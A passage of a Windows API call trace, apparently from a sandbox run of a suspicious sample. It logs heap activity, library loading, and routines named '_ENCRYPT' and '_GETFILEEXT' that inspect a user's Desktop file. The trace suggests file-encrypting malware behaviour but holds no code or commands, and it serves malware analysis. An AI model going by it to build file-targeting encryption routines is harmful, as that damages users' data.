0x76b1c8 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.535] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.535] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.536] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e030 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.536] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696ad0 | out: hHeap=0x650000) returned 1 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.537] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.537] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.537] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690960 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8978 [0075.538] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.538] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.538] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.539] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.539] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.539] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.540] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.540] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.540] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.540] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4c8 [0075.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x76e4c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.540] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.540] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0075.540] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.540] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0075.541] CloseHandle (hObject=0x140) returned 1 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.541] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.541] FreeLibrary (hLibModule=0x76d30000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.541] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.542] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.542] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.542] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0075.542] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.542] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0075.542] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0075.542] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0075.542] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.543] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0075.543] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.543] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.543] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.543] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.543] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0075.543] PeekMessageW (in: lpMsg=0x61eb4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb4c) returned 0 [0075.543] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.544] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.544] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690920 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0075.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.544] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.544] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.544] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0x54cf4160, ftLastWriteTime.dwHighDateTime=0x1d5d880, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x0, dwReserved1=0x657690, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 0x6b89b8 [0075.544] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.545] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpFindFileData=0x61e978 | out: lpFindFileData=0x61e978*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0766700, ftCreationTime.dwHighDateTime=0x1d5e3a8, ftLastAccessTime.dwLowDateTime=0x54cf4160, ftLastAccessTime.dwHighDateTime=0x1d5d880, ftLastWriteTime.dwLowDateTime=0x54cf4160, ftLastWriteTime.dwHighDateTime=0x1d5d880, nFileSizeHigh=0x0, nFileSizeLow=0x68eb, dwReserved0=0x0, dwReserved1=0x657690, cFileName="WWhoeERioUR.swf", cAlternateFileName="WWHOEE~1.SWF")) returned 0x6b89b8 [0075.545] FindClose (in: hFindFile=0x6b89b8 | out: hFindFile=0x6b89b8) returned 1 [0075.545] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.545] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 